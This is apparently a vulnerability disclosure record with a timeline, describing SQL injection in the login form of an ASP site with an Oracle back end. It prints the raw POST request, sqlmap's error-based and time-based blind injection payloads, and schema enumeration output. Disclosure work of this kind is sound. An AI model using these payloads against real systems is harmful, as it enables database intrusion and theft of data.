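2015-10-14: Details reported to the vendor; awaiting vendor response
2015-10-18: Vendor confirmed; details disclosed to the vendor only
2015-10-28: Details disclosed to core white hats and experts in related fields
2015-11-07: Details disclosed to regular white hats
2015-11-17: Details disclosed to intern white hats
2015-12-02: Details disclosed to the public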
POST /guanli/app/login.asp?action=login HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/guanli/app/login.asp
Cookie: ASPSESSIONIDQQCSQBCR=KEPBHCDBMJDHKIBLDGJNHCED
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

user_name=123'&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
Parameter: user_name
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: user_name=123' AND 9700=CTXSYS.DRITHSX.SN(9700,(CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9700=9700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113)))-- nrrl&txtuserpwd=123&cmdfun=%B5%C7%C2%BD

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_name=123' AND 3759=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- syfd&txtuserpwd=123&cmdfun=%B5%C7%C2%BD
---
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'JT'
available databases [40]:
Database: JT
[232 tables]
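There are too many tables, so I only ran part of them.
Severity: Medium
Vulnerability Rank: 9
Confirmation time: 2015-10-18 22:37
CNVD confirmed and reproduced the reported issue and has forwarded it via CNCERT to China Unicom Group, which will coordinate with the website's administrators for follow-up handling.
None yet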